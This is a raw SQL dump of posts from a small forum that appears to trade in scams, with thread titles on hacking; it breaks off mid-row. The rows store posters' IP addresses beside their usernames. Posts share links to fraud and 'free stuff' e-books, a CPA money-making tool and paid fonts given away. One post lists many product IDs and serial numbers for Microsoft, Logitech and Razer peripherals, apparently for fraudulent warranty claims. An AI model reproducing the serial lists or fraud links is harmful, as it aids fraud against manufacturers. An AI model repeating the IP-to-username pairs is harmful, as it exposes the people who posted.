money.\r\n\r\n[url=https://dl.dropbox.com/u/61362288/How%20to%20Get%20%20%2420%2B%20Checks%20from%20Hershey.pdf][img]http://i.imgur.com/sMtZF.png[/img][/url]\r\n\r\n[img]http://findicons.com/files/icons/1994/vista_style_business_and_data/128/key2.png[/img]\r\n\r\n[color=#32CD32]Pass for PDF[/color]\r\n[b]thanks[/b]\r\n[/size]\r\n[/align]', '88.193.83.195', '1489064899', '0', '0', '172', '1347811462', '1', '65a90486d2ad3066dc3e2f08e2903811', '0', '1347811462'); INSERT INTO mybb_posts VALUES('2122', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '62', 'R?????zo?', '1347795298', 'Looks awesome, did you made it yourself?\nI would rate 9/10, would look perfect with a fading border.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9e0f9d7ab6dee3ef5831c325d0ebeb92', '0', '0'); INSERT INTO mybb_posts VALUES('2123', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1347796238', 'yes cuz its a guy that is uploading it with a program that does it automacitly every 1 min or something.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'fa39d13d7d95c3e24acd2de05be55661', '0', '0'); INSERT INTO mybb_posts VALUES('2124', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '53', 'sirchamp', '1347796988', 'the password doesnt work.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3baaef0fb58e6c3e895bfed639fb8f44', '0', '0'); INSERT INTO mybb_posts VALUES('2125', '451', '2111', '19', 'RE: [Recently Created]Free working shell booter', '0', '67', 'HoverCatz', '1347797372', 'Explain how i get it to work?', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '011e0bd757e41797fd0a922d55243355', '0', '0'); INSERT INTO mybb_posts VALUES('2126', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347797455', 'dont enter your country code in the target', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3d7378a9b436dcdbacc28a2922551abc', '0', '0'); INSERT INTO mybb_posts VALUES('2129', '453', '0', '19', '[Junk]Instagram Bot 3.2', '0', '82', 'iTzIpod', '1347800106', '[align=center][img]http://img18.imageshack.us/img18/9883/56d94d20c57346a18cceaa1.png[/img]\r\n\r\n[b]Download:[/b] http://www.mediafire.com/?hgmlkhmp3x9f6k3\r\n[b]Password:[/b] Frez[/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '013596447bc7fb932d7188fecabb8c65', '0', '0'); INSERT INTO mybb_posts VALUES('2130', '370', '2120', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '82', 'iTzIpod', '1347800288', '[quote=\'MistaCode\' pid=\'2120\' dateline=\'1347791339\']\r\n[quote=\'R?????zo?\' pid=\'1874\' dateline=\'1347548689\']\r\n[quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\']\r\nJust saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too.\r\n[/quote]\r\n\r\nif you looking for a logo I can try and make something fancy?\r\n[/quote]\r\n\r\nNo, im not looking for logo :D im just making an logo ;)\r\n[/quote]\r\n\r\nLOL no no no no.\r\nReloadzor was talking to t3h jok3r. Not you :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f2fa1cdc104ae11e9fb3c039fc1be74', '0', '0'); INSERT INTO mybb_posts VALUES('2131', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '82', 'iTzIpod', '1347800433', 'Incorrect password. :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '53f0ca8d060f1a5eacaac9d846201b33', '0', '0'); INSERT INTO mybb_posts VALUES('2132', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1347801078', 'I will get those soon. I got a lot of things going on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd753afd11f98b66078dfec0935bc174', '0', '0'); INSERT INTO mybb_posts VALUES('2133', '446', '2058', '28', 'RE: This forum is dead..', '0', '2', 'Apathy', '1347807770', 'I agree. And technically weren\'t you the first active member joker and me second?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '8b3a9270458036eae97909352325449e', '0', '0'); INSERT INTO mybb_posts VALUES('2134', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '172', 'MistaCode', '1347807894', 'Hmm second let me change it ;)\n[hr]\nUpdated it ;) try now.\n\nmsg2short', '88.193.83.195', '1489064899', '0', '0', '172', '1347807972', '1', 'a4d54d1cb2598705f79a9ccd023497c5', '0', '0'); INSERT INTO mybb_posts VALUES('2141', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '172', 'MistaCode', '1347811593', 'I use CS5 Don\'t want to download CS6 yet :D Well CS6 has awesome features, I saw an tutorial somewhere doing Cray to womens bodies ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '95a9429a806a7b7ab36fe3ddc6ca79f7', '0', '0'); INSERT INTO mybb_posts VALUES('2135', '436', '1988', '7', 'RE: Motivation', '0', '2', 'Apathy', '1347808001', 'The problem is we do not have a \"Pull\" something that attracts people to stay. :3', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'eb8d1348d7bd3d7831e06a85f332b111', '0', '0'); INSERT INTO mybb_posts VALUES('2136', '437', '1995', '3', 'RE: Help keep LH up', '0', '2', 'Apathy', '1347808532', 'I think you could have ads just nit the annoying ones. :3', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '6ab440280cf0f4e699b9cd313c4bfeb8', '0', '0'); INSERT INTO mybb_posts VALUES('2137', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '53', 'sirchamp', '1347810760', 'I so far got about 20 times the xbox live code and I got 5 different PDF\'s :) 2 Moneymaking e-books, 1 book about \"how to get rid of bad memories and 2 e-books on how to call the whitehouse!!', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6c98be73f3fd0fda1fdeb75fc9c354ad', '0', '0'); INSERT INTO mybb_posts VALUES('2138', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '53', 'sirchamp', '1347810895', 'It still doesnt fuckin work. -.-', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ebb5dd66d1469179e2ae1e531abf4586', '0', '0'); INSERT INTO mybb_posts VALUES('2139', '454', '0', '35', 'L33THacking Logo attempt 2', '0', '172', 'MistaCode', '1347811140', 'Well now I took time to this one, but lets see how you like it ;)\r\n\r\n[img]http://i1107.photobucket.com/albums/h400/maxhax195/Attempt-2.png[/img]\r\n\r\nYou can just download it by right clicking it and then Save image as. \r\n\r\nThe background is transparent.', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e776de09fa01eabbad359d5e5f3dce12', '0', '0'); INSERT INTO mybb_posts VALUES('2140', '452', '2138', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '172', 'MistaCode', '1347811413', '[quote=\'sirchamp\' pid=\'2138\' dateline=\'1347810895\']\r\nIt still doesnt fuckin work. -.-\r\n[/quote]\r\n\r\nLOL I was sure that I changed it.... Mediafire fails, ill just damn upload it to Dropbox :)\r\n\r\nhttps://dl.dropbox.com/u/61362288/How%20to%20Get%20%20%2420%2B%20Checks%20from%20Hershey.pdf\r\n\r\nEnjoy ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '680705acf50174f7014fab234be61fea', '0', '0'); INSERT INTO mybb_posts VALUES('2142', '454', '2139', '35', 'RE: L33THacking Logo attempt 2', '0', '1', 't3h jok3r', '1347811679', 'Better than the 1st one. I like the 3D idea especially the font, I will five it a try also can you try doing a green on top and black shadow?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd83c13338b450f5eb5e8a32118b0e7f7', '0', '0'); INSERT INTO mybb_posts VALUES('2143', '431', '2118', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347811790', '[quote=\'R?????zo?\' pid=\'2118\' dateline=\'1347778640\']\r\n[quote=\'t3h jok3r\' pid=\'2103\' dateline=\'1347745224\']\r\n[quote=\'iTzIpod\' pid=\'2102\' dateline=\'1347744004\']\r\nt3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking.\r\n\r\nOT: Thanks Reloadzor for making me this animated signature.\r\nThanks for changing the font too. <3\r\n\r\nVouch for legit and awesome and fast service <3\r\n[/quote]\r\n\r\nYeah, but if I pick a icon and that doesn\'t turn out to look good then his efforts might go into waste.\r\n[/quote]\r\n\r\nif you liked the font I will post like 3-5 versions with different icons when I got the time later. you will pick the best :)\r\n[/quote]\r\nThat would be great, I like the font.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09de8d2f2c2703caaf2cc9bcfd847efa', '0', '0'); INSERT INTO mybb_posts VALUES('2144', '454', '2142', '35', 'RE: L33THacking Logo attempt 2', '0', '172', 'MistaCode', '1347812110', '[quote=\'t3h jok3r\' pid=\'2142\' dateline=\'1347811679\']\r\nBetter than the 1st one. I like the 3D idea especially the font, I will five it a try also can you try doing a green on top and black shadow?\r\n[/quote]\r\n\r\nIt has black shadow but yeah Green top:\r\n[img]https://www.dropbox.com/s/ok8bzkrx983wl0w/Edit.png[/img]\r\n\r\nIf image doesn\'t work: https://www.dropbox.com/s/ok8bzkrx983wl0w/Edit.png\r\n\r\nI tried few effects, lets see if you like it ;)', '88.193.83.195', '1489064899', '0', '0', '172', '1347812136', '1', '45c891c50bf5df9156b6e0bd8c299242', '0', '1347812136'); INSERT INTO mybb_posts VALUES('2145', '437', '2136', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347812518', '[quote=\'Apathy\' pid=\'2136\' dateline=\'1347808532\']\r\nI think you could have ads just nit the annoying ones. :3\r\n[/quote]\r\n\r\nWell I thought of something.\r\n\r\nI can\'t and won\'t keep ads but I will keep paid header ads. PM me if you want to know why I don\'t want company ads', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd6616de9c8b5da6ace2808c68ed67dd8', '0', '0'); INSERT INTO mybb_posts VALUES('2146', '437', '2091', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347812606', '[quote=\'iTzIpod\' pid=\'2091\' dateline=\'1347741361\']\r\n[quote=\'t3h jok3r\' pid=\'2090\' dateline=\'1347737042\']\r\n[quote=\'iTzIpod\' pid=\'2046\' dateline=\'1347711336\']\r\n[quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\']\r\n[quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\']\r\n\r\nAs long as it\'s an adf.ly link and someone clicks on it, you still get money. :p\r\n[/quote]\r\n\r\n\r\nI have no idea what you are talking about.\r\n[/quote]\r\n\r\nI meant. l33thacking.net was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o\r\nBut you changed it to L33thacking.net now so it doesn\'t matter.\r\n[/quote]\r\n\r\nOh OK, it\'s better to have it redirect to the new LH site because then we can even get more members.\r\n[/quote]\r\n\r\nDo you know an estimate on when that\'s gonna happen?\r\n[/quote]\r\nHad to double post because I\'m ony iPod.\r\n\r\nAround 2-4 new members everyday if my spreading succeeds.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c24f1b357921fb07b8b0b333543659f4', '0', '0'); INSERT INTO mybb_posts VALUES('2147', '455', '0', '29', 'CPA Twister 1.3 by sonex [FREE]', '0', '172', 'MistaCode', '1347812651', 'Hey guys, as the owner (sonex) is angry that my paypal account is closed and I got the money back, as Paypal thinks I\'m using fraud CC or doing Illegal money. So they will soon contact me though, but I wanted to share this as my Accounts are getting closed on HF/UB...\r\n\r\nDownload:\r\nhttps://dl.dropbox.com/u/61362288/CPA%20Twister%201.3%20by%20sonex.rar\r\n\r\nEnjoy & Don\'t Forget to say thanks!', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '23499af900e8a5b7eb4d74d628752d51', '0', '0'); INSERT INTO mybb_posts VALUES('2148', '456', '0', '29', 'Galaxian PPD Method v2 [Free]', '0', '172', 'MistaCode', '1347812738', 'Price: 14.99$\r\nOur Price: 0.00$\r\n\r\nDownload :\r\nhttps://dl.dropbox.com/u/61362288/Galaxian%20PPD%20Method%20v2.rar\r\n\r\nEnjoy & don\'t Forget to say thanks!', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f1289e43baeab142d363f32f983697f9', '0', '0'); INSERT INTO mybb_posts VALUES('2149', '457', '0', '29', 'Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '172', 'MistaCode', '1347812885', 'Well they don\'t share this anymore anywhere, so I decided to share it here ;)\r\n\r\nDownload :\r\nhttps://dl.dropbox.com/u/61362288/Get%20free%20Alienware%20Laptops%20%5BSecret%20Loophole%20of%20Dell%20Revealed%5D%28Limited%20Edition%29.pdf\r\n\r\nDon\'t Forget to say thanks ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '0f99ba05dff93842711b3cfec87a1f56', '0', '0'); INSERT INTO mybb_posts VALUES('2150', '458', '0', '29', 'How to get 26 months free of xbox live membership', '0', '172', 'MistaCode', '1347813005', 'Price: I think about 5$\r\nOur Price: 0.00$\r\n\r\nThanks to me for buying this ;)\r\n\r\nDownload :\r\nhttps://dl.dropbox.com/u/61362288/How%2Bto%2Bget%2B26%2Bmonths%2Bfree%2Bof%2Bxbox%2Blive%2Bmembership.pdf\r\n\r\nEnjoy !(:', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e646cf805d34b561023ea4ccbf7f371f', '0', '0'); INSERT INTO mybb_posts VALUES('2151', '459', '0', '29', 'Affiliate Marketing [Price: 8$]', '0', '172', 'MistaCode', '1347813077', 'Price: 8$\r\nOur Price: 0.00$\r\n\r\nBought by me & shared by me ;)\r\n\r\nDownload :\r\nhttps://dl.dropbox.com/u/61362288/Affiliate%20Marketing%20by%20sonex.rar\r\n\r\nEnjoy !(:', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '2d29fb1ad53239e3c58340c9608b2e21', '0', '0'); INSERT INTO mybb_posts VALUES('2152', '446', '2058', '28', 'RE: This forum is dead..', '0', '172', 'MistaCode', '1347813129', 'Well im trying :D Look the Advanced Methods section, I posted few HQ e-books !', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '112a978f666eb19ed5dcd37507fd184b', '0', '0'); INSERT INTO mybb_posts VALUES('2153', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '62', 'R?????zo?', '1347814921', 'link is broken, please fix it.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e8f46ac65741c5b919535842128b28ce', '0', '0'); INSERT INTO mybb_posts VALUES('2154', '457', '2153', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '172', 'MistaCode', '1347815654', '[quote=\'R?????zo?\' pid=\'2153\' dateline=\'1347814921\']\r\nlink is broken, please fix it.\r\n[/quote]\r\n\r\nSo weird... All my links are dead ugh...\r\nhttps://dl.dropbox.com/u/61362288/Get%20free%20Alienware%20Laptops%20%5BSecret%20Loophole%20of%20Dell%20Revealed%5D%28Limited%20Edition%29.pdf\r\n\r\nNot it works ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f36ef33eb2751597429a29c86a0b9d90', '0', '0'); INSERT INTO mybb_posts VALUES('2155', '443', '2101', '42', 'RE: Apple Announces the iPhone 5', '0', '172', 'MistaCode', '1347816171', '[quote=\'iTzIpod\' pid=\'2101\' dateline=\'1347743858\']\r\nI know right?\r\nThat\'s really expensive...\r\n[/quote]\r\n\r\n200$ for iPhone? That\'s called Cheap for iPhone. As iPhone 4S was 500$, and that\'s called expensive.', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '5e6e0112fca47d95e39d3d44f66e55a6', '0', '0'); INSERT INTO mybb_posts VALUES('2156', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347816205', 'Hope you like it:\n\n[URL=http://imgur.com/0VS9Y][IMG]http://i.imgur.com/0VS9Y.png[/IMG][/URL]\n\n[URL=http://imgur.com/gTAZz][IMG]http://i.imgur.com/gTAZz.png[/IMG][/URL]\n\n[URL=http://imgur.com/a14ON][IMG]http://i.imgur.com/a14ON.png[/IMG][/URL]\n\n[URL=http://imgur.com/NoerW][IMG]http://i.imgur.com/NoerW.png[/IMG][/URL]\n\n[URL=http://imgur.com/Y8ZlJ][IMG]http://i.imgur.com/Y8ZlJ.png[/IMG][/URL]\n\n[URL=http://imgur.com/8ojq4][IMG]http://i.imgur.com/8ojq4.png[/IMG][/URL]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8689f048cda63a72485d988ff63fe72e', '0', '0'); INSERT INTO mybb_posts VALUES('2157', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '53', 'sirchamp', '1347816744', 'LOL I cant open the file. Wierd', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3435d8c125acf4b1d4ad4a620d9b0182', '0', '0'); INSERT INTO mybb_posts VALUES('2158', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347817103', 'i\'ve came up with this :P\n\n[img]http://i.imgur.com/HFb4o.gif[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '888cc1cac695a5c04760c813d4146e0f', '0', '0'); INSERT INTO mybb_posts VALUES('2159', '460', '0', '34', 'R?????zo?\'s font pack, 1500+ [FREE]', '0', '62', 'R?????zo?', '1347817644', 'Heres the fonts I use, most of them are paid fonts and I\'m giving you for free.\r\n\r\nProof:\r\n\r\n[img]http://i.imgur.com/8iZOR.png[/img]\r\n\r\nDownload link:\r\nhttp://www.mediafire.com/?m3dmo48r2aa142s', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '73a304f7c6a46f83be2c89054c08758a', '0', '0'); INSERT INTO mybb_posts VALUES('2160', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '62', 'R?????zo?', '1347817749', 'its still broken for me :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11a4da469b6e0734b79b3ed26c3708d6', '0', '0'); INSERT INTO mybb_posts VALUES('2161', '436', '2135', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347824573', '[quote=\'Apathy\' pid=\'2135\' dateline=\'1347808001\']\r\nThe problem is we do not have a \"Pull\" something that attracts people to stay. :3\r\n[/quote]\r\n\r\nWhat is this \"pull\" you\'re talking about? I don\'t get what you mean..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1561bf292082e2eaa33e96f1da3ced24', '0', '0'); INSERT INTO mybb_posts VALUES('2162', '289', '2137', '15', 'RE: UploadNSell Exploit Program', '0', '82', 'iTzIpod', '1347824636', '[quote=\'sirchamp\' pid=\'2137\' dateline=\'1347810760\']\r\nI so far got about 20 times the xbox live code and I got 5 different PDF\'s :) 2 Moneymaking e-books, 1 book about \"how to get rid of bad memories and 2 e-books on how to call the whitehouse!!\r\n[/quote]\r\n\r\nWant to share them to L33t Hacking?\r\n\r\nLike release it in the Upgraded Section or something? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a99427df1a6feb645079f8e04245d31b', '0', '0'); INSERT INTO mybb_posts VALUES('2163', '454', '2139', '35', 'RE: L33THacking Logo attempt 2', '0', '82', 'iTzIpod', '1347824745', 'Looks way better than the first one. 8/10.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9dce2024627903e783d1326a4a156be7', '0', '0'); INSERT INTO mybb_posts VALUES('2164', '446', '2152', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347825009', '[quote=\'MistaCode\' pid=\'2152\' dateline=\'1347813129\']\r\nWell im trying :D Look the Advanced Methods section, I posted few HQ e-books !\r\n[/quote]\r\n\r\nI know. I saw them.\r\n\r\nGood job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de598bae4384e6e54133098ab543655d', '0', '0'); INSERT INTO mybb_posts VALUES('2165', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347825140', 'The iPhone 5 64 GB is $399 + tax.\n\n+ That\'s quite expensive in my opinion..\n\niPhone 4S was expensive too. I didn\'t say it wasn\'t.', '24.212.197.164', '416597412', '1', '0', '82', '1347825248', '1', '6451d2db97d8e52747b60d2905464c8b', '0', '1347825248'); INSERT INTO mybb_posts VALUES('2166', '431', '2156', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347825208', '[quote=\'R?????zo?\' pid=\'2156\' dateline=\'1347816205\']\r\nHope you like it:\r\n\r\n[URL=http://imgur.com/0VS9Y][IMG]http://i.imgur.com/0VS9Y.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/gTAZz][IMG]http://i.imgur.com/gTAZz.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/a14ON][IMG]http://i.imgur.com/a14ON.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/NoerW][IMG]http://i.imgur.com/NoerW.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/Y8ZlJ][IMG]http://i.imgur.com/Y8ZlJ.png[/IMG][/URL]\r\n\r\n[URL=http://imgur.com/8ojq4][IMG]http://i.imgur.com/8ojq4.png[/IMG][/URL]\r\n[/quote]\r\n\r\n\r\n\r\nLOL\r\nGotta love the first one.\r\nAsian guy <3\r\n\r\nOr he looks asian..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97e373d213efb5caa8b774046a370796', '0', '0'); INSERT INTO mybb_posts VALUES('2167', '345', '2158', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347825330', '[quote=\'R?????zo?\' pid=\'2158\' dateline=\'1347817103\']\r\ni\'ve came up with this :P\r\n\r\n[img]http://i.imgur.com/HFb4o.gif[/img]\r\n[/quote]\r\n\r\nYou gotta teach me how to do that...\r\nIt looks so professional... :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '34a1e64e029a7115be5b50a3e2aa5b34', '0', '0'); INSERT INTO mybb_posts VALUES('2168', '460', '2159', '34', 'RE: R?????zo?\'s font pack, 1500+ [FREE]', '0', '82', 'iTzIpod', '1347825403', '[quote=\'R?????zo?\' pid=\'2159\' dateline=\'1347817644\']\r\nHeres the fonts I use, most of them are paid fonts and I\'m giving you for free.\r\n\r\nProof:\r\n\r\n[img]http://i.imgur.com/8iZOR.png[/img]\r\n\r\nDownload link:\r\nhttp://www.mediafire.com/?m3dmo48r2aa142s\r\n[/quote]\r\nThank you so much <3\r\n\r\nI really needed these.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f3a331054291c43a656d6b3b3264e83', '0', '0'); INSERT INTO mybb_posts VALUES('2169', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '82', 'iTzIpod', '1347825465', 'Thanks.\n\nPassword is thanks for the Dropbox Link.\n\nThanks MistaCode.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a7fd2bbce5b2bf0e195962ffdcd75ee7', '0', '0'); INSERT INTO mybb_posts VALUES('2170', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '82', 'iTzIpod', '1347825558', 'Link is broken.\nTry uploading it to depositfiles, localhostr, mediafire, rapidshare, etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3df8f707edd04f7781a9db095d153e07', '0', '0'); INSERT INTO mybb_posts VALUES('2171', '461', '0', '43', 'some PID\'s List', '0', '62', 'R?????zo?', '1347825758', 'PID\'s List\n\n[quote]Microsoft Arc Keyboard\n\nP/N: J5D-00001\n\nS/N: 0204400224952 EC\n\n0204400251135 EC\n\n0204400320975 EC\n\n0204400224950 EC\n\n0204400310636 EC\n\n\nMicrosoft Sidewinder X6 Keyboard\n\nPID: 00905-137-3443232-61938\n\n571545228751301000\n\n\nMicrosoft Comfort Curve Keyboard 2000\n\nPID: 76914-185-5603133-14335\n\n\nRazer Arctosa Gaming Keyboard\n\nProduct Code/Model #: RZ03-00260100\n\nSerial: MT1003026H01379\n\n\nSaitek Eclipse II Backlit Keyboard\n\nProduct Code/Model #: PK02AU\n\nSerial: 7G15306611B\n\nMicrosoft Arc Mouse\n\nP/N: RVF-00001\n\nPID: 00514-545-3653004-21049\n\nPN: X817620-002\n\nS/N: PM1047035101191\n\n\nRazer Mamba Gaming Mouse\n\nP/N: RZ01-00120100-R3U1\n\nS/N: Gaming Mouse : PM1041012100913\n\nCharging Dock : PM1041D12100913\n\n\nMadcatz Infinity Ward Wired Sniper Mouse\n\nM/N: 44300\n\nS/N: FO73400415\n\n\nLogitech Corded M500 Mouse\n\nM/N: M-U0007\n\nP/N: 810-001176\n\nPID: LZ041A3\n\n\nLogitech Corded LS1 Mouse\n\nM/N: M-UAS144\n\nP/N: 810-000622\n\nPID: LZ938AJ\n\n\n\nLogitech Wireless M215 Mouse\n\nM/N: M-R0013\n\nP/N: 810-001550\n\nPID: LZ006AW\n\n\nRazer Imperator Gaming Mouse\n\nProduct Number : Rz01-00350100-R3u1\n\nSerial Number : PM1047035101191\n\n\nLogitech MX Revolution Wireless Mouse\n\nM/N: M-RBQ124\n\nP/N: 831869-0000\n\nPID: LZ638A9\n\n\nExplorer Mini Mouse\n\nPID: 00516-545-0476765-00145\n\n\nSidewinder x8\n\nPID: 00903-163-4444946-74171\n\n\nArc Touch Mouse\n\nPIDs:\n\n00514-545-0770350-03565\n\n00514-545-1695089-03496\n\n00514-545-1239104-03840\n\n00514-545-1573981-03808\n\n00514-545-0681890-03793\n\n00514-545-1572489-03928\n\n00514-545-1351204-03497\n\n00514-545-1926830-03920\n\n00514-545-0471539-03507\n\n00514-545-0326292-03144\n\n03020-523-0609733-01045\n\n\n\nWorld of Warcraft SteelSeries Cataclysm MMO Gaming Mouse\n\nProduct Code/Model #: 62100\n\nSerial: 6210000111291027574\n\n\nMicrosoft LifeCam Cinema HD\n\nP/N: H5D-00001\n\nPID: 02045-545-1754434-00941\n\nPN: X821404-001\n\n\nMicrosoft LifeCam VX-3000\n\nPID: 78038-171-8422822-97199\n\n\n\nMicrosoft LifeCam VX-6000\n\nPID: 78040-781-6325174-25233\n\n\n\nMicrosoft LifeChat LX-3000\n\nPID: 79108-237-3434025-55476\n\n\nPlaystation Eye\n\nS/N: 990004612\n\n\nLogitech USB QuickCam Communicate Webcam\n\nPID: LZ510A54667\n\nM/N: V-UAM14A\n\nP/N: 861194-0000\n\n\nMicrosoft Presenter 3000\n\nPID: 78041-517-4315323-61888\n\n\n\nToshiba 160GB HDD\n\nHP Spare Code: 442171-001\n\nP/N: 440640-001\n\n\nXbox 360 Controller\n\nPID: 05880-545-1514247-01506\n\n\nPS3 Dualshock 3 Controller (Not sure if this works!)\n\nM/N: CECHZC2U\n\nS/N: 0K40090101270\n\n\nLogitech Wireless S510 Desktop Set\n\nP/N: 920-000885\n\nM/N: Y-RAK73\n\nPID: LZ7386mc\n\nType: Keyboard/Mouse\n\n\nKensington Ci70 Keyboard Mouse COMBO\n\nProduct Number : K64392US\n\nSerial Numbers :\n\nA0730A000071\n\nA0915A000100\n\n\nMicrosoft Wireless Laser Desktop 7000\n\nPID: 92463-556-5333966-23786\n\n\n\nMicrosoft Wireless Entertainment Desktop 7000\n\nPID: 81616-313-1446283-25255\n\n\n\nMicrosoft Wireless Entertainment Destop 8000\n\nPID: 81615-825-6340215-11984\n\n\nMicrosoft Wireless Laser Desktop 6000 v2.0\n\nPID: 77967-638-2335413-14267\n\n\nSPEAKERS:\n\nLogitech LS11 Speakers\n\nPID: CP047\n\n\nLogitech Speaker System Z323\n\nPID: SN012\n\n\nLogitech Rechargeable Speaker S715i\n\nPID: GG046\n\n\nLogitech Z323\n\nP/n: 980-000354\n\nM/n: s-00075a\n\nPID: sn043\n\n\nLogitech LS21\n\nPID- SN012\n\nM/n- S-00040\n\nP/n- 880-000117.[/quote]', '94.132.244.168', '1585771688', '1', '0', '62', '1347825781', '1', '603a33721133700f13243287dd47857c', '0', '1347825781'); INSERT INTO mybb_posts VALUES('2172', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '61', 'NXK', '1347831020', 'Yes, The link is still broken, Try a different host like media fire, And just password it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a372e6c1f0cdb25b19c5f98fdb9680be', '0', '0'); INSERT INTO mybb_posts VALUES('2173', '457', '2172', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '82', 'iTzIpod', '1347839019', '[quote=\'NXK\' pid=\'2172\' dateline=\'1347831020\']\r\nYes, The link is still broken, Try a different host like media fire, And just password it.\r\n[/quote]\r\n\r\nSuggested password: l33thacking.net \r\n\r\nJust in case someone leeches it or leaks it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0afb57a6681933d62c4c32f7a9848c70', '0', '0'); INSERT INTO mybb_posts VALUES('2174', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '112', '??????Z', '1347839122', 'Lol ipod. \r\n\r\nSize: about the same size as yours Reloadzor\r\n Colour Scheme: silver, grey\r\n Render/Image: you choose, im not very creative :)\r\n Text: ??????Z\r\nSignature + avatar please buddy :)\r\n\r\nCheers pal', 